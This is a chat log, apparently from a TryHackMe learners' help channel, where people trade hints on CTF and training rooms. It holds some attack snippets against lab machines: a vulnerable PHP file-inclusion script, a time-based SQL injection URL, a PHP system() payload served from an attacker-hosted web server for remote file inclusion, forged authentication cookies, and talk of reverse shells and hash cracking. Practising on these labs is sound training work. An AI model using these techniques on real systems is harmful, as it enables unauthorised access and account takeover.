Ah just to make sure to not send you in a rabbit hole, you said you already got the pw from the PNG. Could you send ma a DM with the PW you got out of it?

Definitely, I will do that rn

Thanks for the hint mate, I was able to get the credentials🥰 🥰 🥰

Gave +1 Rep to @left thunder

😋 😫 😩 😩 😩

🍴 🍴 🍴 🍞 🍞

BioHazard is interesting ^^

any hints on the key section please? but not too much of a hint 😄

It's y

Found it woo

hey yall, I've been struggling with part of the sakura osint dojo room, specifically getting the email address of the attacker (though I have been able to get the full name). Can anyone give me a hint or a direction to search? I've tried searching google using the username, fullname, and ||some ethereum wallet code thing (I'll be honest, I don't fully understand it) || without any luck so far.

somebody did Hip Flask's room?

Hi

it's new hello

Halo

in spoilers for everyone else, but not giving too much away : || you'll need their github, which i imagine you got from the username google search. one of the repos will give you an indirect way of getting their email address - easy if you're familiar with what's in the repo, if not googling should help you out. to stop you going too much down a deadend, as far as i know you can't get the email address from the ethereum wallet.||

what is the command for windows troubleshooting? such a vague question. any help plz, I'm stuck 😩

Thank you

Gave +1 Rep to @polar finch

are you talking about msdt.exe?

No, I found the path in system config tools

cc:pen testing
im not sure what to do next,i found a secret directory and found a txt file

content of the file:
nyan:046385855FC9580393853D8E81F240B66FE9A7B8

nyan (username) : 046385855FC9580393853D8E81F240B66FE9A7B8 (hashed password)

try to bruteforce the hash

and then log in via ssh?

most likely

because that port was open

then I assume that you'll have to try escalating your privileges to get the content of root.txt

yep i noticed

Anyone with a tip on how to tackle Hacker of the hill, Hard Challenge, Container 3 (I love hills). I found an sql injection vuln. but dump of database was not useful.

am i actually supposed to escalate my priviliges for the last answer?

its a beginner ctf so im not sure if im really supposed to do that

im actually curios what this sudo as admin successful thing is

I'm needing a hint for the Upload Vulnerabilities Room - Task 6 Remote Code Execution
When I attempt to execute a php reverse shell, I get the error on the browser page " WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111) ". Is this part of the challenge or am I running into a "bug"?

nvm the answer was really simple

Nevermind, I got it.

Haven't done the box but there's more things you can do with SQL injection than just dumping the database

solving team room . from lfi i got ssh key but it said invalid key format.

key is openssh private key

you removed all the invalid characters, yes?

Make sure there's no whitespace. That could be the problem :P

OhSINT room any hints ?

That's a pretty vague question to give you a hint about.

Nvm, I found walkthrough.

hi i am doing overpass 3 room and im stuck i found backup.zip and cracked the xlsx file and read it but im stuck it wont work for ssh and VM seems crashing alll time, sometimes even wont i runned common.txt for other directories and found interesting one cgi-bin but im stuck any hints?

i didnt check ftp i will try it now

as i got now usernames and password i can log into ftp 🙂

someones did inferno's room?

hi, in the second login panel, the credentials my credentials aren'tworking, i watch write ups and idk wtf is happening, was the machine changed?

Solving dogcat found lfi. web application append php to each input. using wrapper i can only read index.php how to read other files.

<?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
        $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>

try to use null byte to bypass extention but failed.

hello, I can't get my reverse shell back in metasploit module : meterpreter room.

pls someone dm to me.

check multi handler.

Hi I am doing the room: Simple CTF. I just finished all the questions except for these 2. I tried looking for the CVE in the exploit-db but no hits. any hints?

google

Hi I've just got the credentials for the nax room but can neither login to the login portal or use the credentials for the metasploit exploits. Any help please?

I've got it!

However I am getting "This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/pbCiSeWdPpQa.php'"?

It's ok, got that now, wrong exploit!!!!

look again at this line : $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php'; If i remember correctly, adding null bytes to bypass file extensions has been fixed in PHP for a while

hey pal, thanks, i got it after some php docs reading. thanks anyways.

Gave +1 Rep to @polar finch

https://tryhackme.com/room/25daysofchristmas I am currently doing this room, task 6, Day 1. The third question "After accessing his account, what did the user mcinventory request?" Did anyone do that and can give some hints? Do I just have to guess everything or can I find the right request?

Thought I would try earlier versions of Advent Of Cyber

Why guessing, there is only 1 item he requested?

no?

Yes.

look around the web and see the list of requests

its ±5 x2 table

but there are none

did you changed the cookie?

wait

and its on the bottom

no? It doesn't ask to change the cookie

But it doesn't ask to change the cookie, it just asks to find present which would be in inspect element

you decode cookie and use this information to change it and log in as user mcinventory

I got this v4er9ll1!ss

when decoding

so you already got it just craft the new cookie and decodi it again with different username as you created?

encode*

refresh the page and you will have it

What do you mean?
After accessing his account, what did the user mcinventory request? is the question. I don't understand

I meant

You said to craft a cookie. How do you do that? Google only gives me pictures of crafting table in Minecraft

You can only see what he requests, if you are inside his account.

so I have to hack his account then or what?

I don't understand

how do you craft cookies

Right. Did you check the supporting material linked in that room?

yes

Have you answered question 2 ?

yes

So that means you took the cookie and base64 decoded it, right?

yes, I put it in the online decoder

After you did that, you saw that this cookie (which in this case is used to authenticate the user) was build like Username+randomstring ?

yes

I pasted that random string

and it was okay

So now you have to reverse that process. Take the username of the user you want to have access to the account of. Then append the random string of question 2 to it. And base 64 encode it now. So basically doing everything in the opposite direction now.

oh

never thought of that. I searched in Inspect Element, so that was the problem

Okay, thank you a lot. Helped me to look at the task from different perspective

Gave +1 Rep to @left thunder

i dont understand why its not -v2 (nmap verbose flag)

Check nmap -h that's giving you the answer

so its -vv

i wonder why the official site doesnt even mention it

actually it does but indirectly

so if i wanted level 3 i would say -vvv?

Right

Hi! Recently got to the end of Volatility and am having trouble with the last question. I tried googling as well. Question is:
What malware has our sample been infected with? Could someone help ?

I'm new - hope I have the right room.

the room should direct you to upload samples to virustotal and hybridanalysis

If i remember it right...

Scroll thru all the info available for the results. Note the names different antivirus products identify this malware by

I tried the different names, about 3 different ones

Try not full ones

for example Worm.Win32.Rampage.f0000

Is Rampage

I just have my notes saying it's CSRSS.exe 584

looking for a "push" in the right direction. Im on this room where i found a login and upload page. The login page seems injectable, but only for the username(?). It reveals the upload page, which states that i dont have permissions. any ideas what to look for here?

which room?

dangerzone

1 sec

@rain shore #nc3ctf2021 DangerZone B2R?

yup

Active CTF. We don't offer help for those

Sorry

all cool

wasnt looking for a direct hint actually

No help at all

cool cool 🙂 thanks anyway

❤️

gl

still a lot of time

thank you. Have a nice evening (or whateverm depends on your location i guess)

Testing autofarm :)

hi

I am stuck on the Metasploit room. In Task 5 where I need to exploit the Ice box. I follow the instructions (I believe), but when I run exploit I get a "Exploit completed, but no session was created." Does anyone have a hint? The LHOST is set to my tun0 IP and the RHOSTS is set to the target box IP

Room: Network services Enum & Exploitation https://tryhackme.com/room/networkservices
Task: Enumerating SMB: Question 6
Question: I feel like I should know this already since it hasn't said a word about share sticks, I tried doing research but couldn't find a thing. Can somebody explain what share sticks are? The question relates to the OS info I believe, if you need: run this command and go to the OS section.

this is an english language thing - it says "what share sticks out", this means which share appears different or interesting when compared to the rest. you can take the question just as "Which share might we want to investigate?"

Wow thanks, I feel really stupid now.

Gave +1 Rep to @polar finch

I was over here thinking it was something technical...

On "Authentication Bypass" Task i only get the result, but no Password:

:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

does someone have an idea what i did wrong?

Your valid usernames file should only contain 1 username per line, so no status codes etc. Best to create a fresh file manually and put the names in it, don't just edit the output file of ffuf.

Ah thanks, the second you wrote it, i was trying it, now it´s working. Copy/Paste is not always good 🙂

Gave +1 Rep to @left thunder

solved the same issue with this tip. what happens when we have more usernames than we can manually input in a file though?

How many username are you talking about?

Because rockyou.txt has 14 millon passwords

i wasn't talking about the passwords tho

I was using rockyou as an example of how many words there can be in wordlists.

I just don't understand what you're talking about when you say "more usernames than we can manually input in a file".

oh ok, you know the wordlists and the valid_usernames work together right? I was ||talking about automating the process with manually updating a text file||

*without

i'm new to this so it was just a thought

what do you mean valid_usernames? I think I get what you're trying to say... like how to make a wordlist easily without having to type everything manually? That stuff can be automated for sure yeah :)

yeah, thats what i meant

thought about trying|| curl {command_opt} >> valid_usernames.txt | grep {regex} | cut -d ' ' -f 1||

sorry not ||curl but ffuf||

never got around to try it though cos now i'm stuck on task 2 of SSRF in the #junior-pentester-path . anyone help with hints? its driving me nuts 😫

idk I haven't made a script that does that yet

yeah, the basic idea i had was to pipe the output of the wordlist ffuf command to grep and cut per line of the valid_usernames.txt file selecting just the first column in the line. Don't know if that makes sense yet. didn't try it

Linux Fundamentals 3 Task 4: Anyone able to offer a hint which "home" directory I should be starting a web server - I've tried /home /etc and pretty much all others, but I'm unable to wget the flag

What do you mean? Should just be ||python3 -m http.server||

After that, use the directory they give you in the next question to pull the file

the home directory is the main directory of a user where they have Documents, SSH keys, etc... /home

hey all, im stuck on Task 8 of the SQL Injection room. Ive gotten to the point where ive figured out the table name and column names. when i go to query the info in the columns i cannot seem to get anything

Which SQL injection room? There are a few. Provide the link pls.

https://tryhackme.com/room/sqlinjectionlm

And what's the query you try?

https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(3),2 from analytics_referrers where id like 'a%' ;

Go over the table name again, there might be another one.

ok gotcha, thanks!

Gave +1 Rep to @left thunder

Greenhorn here, but i've used windows since i was a small boy.
im stuck on the Windows Fundamentals 1 in Learning.

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
6* 6* ?

I've tried literally everything and i can't think what it is 😂

right click

There is a short documentation linked for the notification area. Check that out.

Sorry, dont understand

In the room page, for that task. There is a documentation linked that provide you with the answer.

sure, read it many times. Am i being thick? Theres:
The Desktop
Start Menu
Search Box (Cortana)
Task View
Taskbar
Toolbars
Notification Area

None are 6 chars _ 6 chars

nmap -sn 172.16.x.x/16 what to do

Check the linked documentation.

x.x might be a bit hard to scan. Something else might fit better

0.0?

Mayhaps

Try it

Nice thx lol

Thought it was just the IP being hidden if that makes sence

They give you the netmask though

done that too - im going mad over here. I'm now regex searching the webcontent for 6letters 6 letters and the only time it appears is "United States", and sadly that wasn't the answer

someone ELI5 so i can move past this point in my life

You went to that page and didn't find the answer ? https://support.microsoft.com/en-us/windows/customize-the-taskbar-notification-area-e159e8d2-9ac5-b2bd-61c5-bb63c1d437c3

sure, thats where the link took me to, except it was the win10 page and not the win11 page, which makes sense considering the attack box for that room is a win10 machine

Well, if you can't find the answer on that page I linked, you have to read more carefully. The answer is right there and it's not even much text.

profanities UK english spells the second word differently...

?

US: Center
UK: Centre

so i used the english one and ... Uh-Oh! Wrong Answer!

Ah, okay. Well ^^

sorted ... now i can move on with the next question - see you in 5 😂

I'm really not having fun with the windows machines in the learning sections.
Account Status? Says "ok" to my eyes, but its not correct. I think a lot of the answers are too ambiguous

like, "change to small icons" is greyed out on the machine so...?

I don't remember having a lot of fun with the windows fundamentals rooms hehehe. Also a UK person here XD

The linux section was brilliant! I've only used linux for 2 years and only recently really starting actually USING it for productive stuff. Windows machines i've used since a small boy and ... yea

I remember crawling through the Windows section. I remember not having a lot of fun with it.

There are write-ups you can check if you want and then you can go looking for why the answer is what it is.

awesome, any idea where i might find those?

Yeah I had issues with that room too

The last setting wasn’t the one they were looking for when I did it

Google ;)

https://tryhackme.com/room/agentsudoctf
In task 3, we are supposed to open a password protected txt file. I did that via the File Explorer UI in Kali, but I was curious as to how to do that via CLI?

the zip file?

you can unzip with password using unzip -P

hello all i facing issue in Blue room

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.

Linux Fundamentals 3 Task 4: what am I doing wrong here?

Did you check where is the .flag.txt file located?
IIRC, it should be inside ||/home/tryhackme||
Your request, wget .../home/.flag.txt translates to the file -
/home/home/.flag.txt
Because you started the HTTP server inside /home

So you could either start your server inside ||/home/tryhackme||
Or GET - ||wget .../tryhackme/.flag txt||

yep, that did it - wrong /home directory

If you don't specific a directory/folder then the server starts with respect to the current directory
There is -d flag as well to specify a directory to run the server within😄

Solved on my own, please ignore

RQ for Help: Room https://tryhackme.com/room/burpsuiterepeater
trving to get a 500 response and flag from the server while using burp repeater on the products requests https://ROOMIP.p.thmlabs.com/products/3
exchanging in repeater the 3 for text or impossible numbers only give me a 404 answer on my requests:
For example:
GET /products/example-text HTTP/1.1
gives answer response:
HTTP/1.1 404 NOT FOUND

0 or other high or minus numbers give the same

Goal of room is:
See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs.

What am I doing wrong?

Solved, the request https://roomip.p.thmlabs.com/products/-1 brought the 500 error and Flag, please ignore my threat

Hello Guys , is there any room to practice SQLMAP deeply?

Hello I need help at task 5 spoofing and decoys

Please

This seems like a trivial question, but I’ve been all over the web…
Linux Part 3
VIM
Task 2
How do we enter INSERT mode? i
How did we start entering text into our new VIM document? I have no idea. I think the answer is, start typing. Supposed to be six characters. #
Help!

Anyone done the Regular expressions room?

By typing

IG there is a room called sql injection
The premium one

Haven't seen it. Searched it

Ca. You share any link of it

This one?

Got it.

Thanks again.

This one too

Thanks a lot. I was trying to find it from a very long time.

NP mate

Any hint for advent of cyber T11Q5?
Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

Oh are you freaking serious....

....

Nah, I'm not gonna say anything about it...

Toolbox: VIM, Task 5, last question:
How do we use "grep" to search for a pattern in multiple files?
Everywhere I look, the answer is vimgrep. THM seems to want a 7-character answer. But it doesn't accept vimgrep. Pulling my hair out.

vimgrep is a command we use in vim. Remember how to use a command in vim. Exit out of insert mode :)

Any hint for "Masterminds" room, Task 3 Second last question "amount dns queries"?

using LFI you can know path to cred's McSkidy (index.php)

Thanks, Yato, but I don't follow. The question is:
How do we use "grep" to search for a pattern in multiple files? 7 characters.
Exiting insert mode is esc. I can't see how that helps me.

Gave +1 Rep to @tulip mural

In the "Network Services" room, in the last chapter "Exploiting FTP" there is a second file inside the folder, which is a ruby script, named "futurebackup.rb". I know it's not part of the chapter, but I tried replacing the IP with mine to get a nc connection, but looks like it's not getting executed. Is the script even being executed at some interval or is it just there to mess with you?

i think you should be using http-post-form 🙂

hi, I'm working on the room File Inclusion (fileinc), and I'm down to the playground. I haven't managed to gain RCE. What I'm doing, I created a payload text file on github (I confirmed public access). The content of the file is just <?php system(hostname);?> and I am imputing the url of the text file in the box. I'm new to this and I'm not php savvy, but I am trying to extend from yesterday's AoC3

The target machine may not have internet access to be able to access a file hosted on GitHub
You can try to host it on your attacking machine, using python3 -m http.server <PORT>
And there is a minor correction to your payload
It should be -

<?php
  echo system("hostname");
?>

The command within "..."

thanks! I'll try again using github, since the machine's firefox could open it, just to double check. But I much rather the server route to avoid commits and editing somewhere else. I'll report on the github access in a bit

Just a little note for the second network services room, on the very last step for nfs enumeration it will ask you to put in a password when it shouldn't. You can bypass this by typing Sudo before you enter the command

you didn't noticed that smiley ig. The answer is ||:vimgrep||

Hello guys!
I'm currently having fun on the Mustacchio challenge but honestly it's been like 2 days that I'm trying to come up with a solution on my own but I can't go forth 😅
I found a username and a hashed password that I cracked with john but the only service that I can exploit is SSH (port 22) but it asks for a key-based authentication

Any hints chads?

feel free to ping me

Still having a bit of trouble. I followed your advice and am using http.server. Payload reads identical to yours, so I am guessing now the problem must be I am not getting the file inclusion right. I am using <ip>/playground.php?file=http://0.0.0.0:<port>/payload.txt when I type everything on the right of the = I do get the contents of the file which match what you posted here (including the double quotes). Can you tell what I am missing?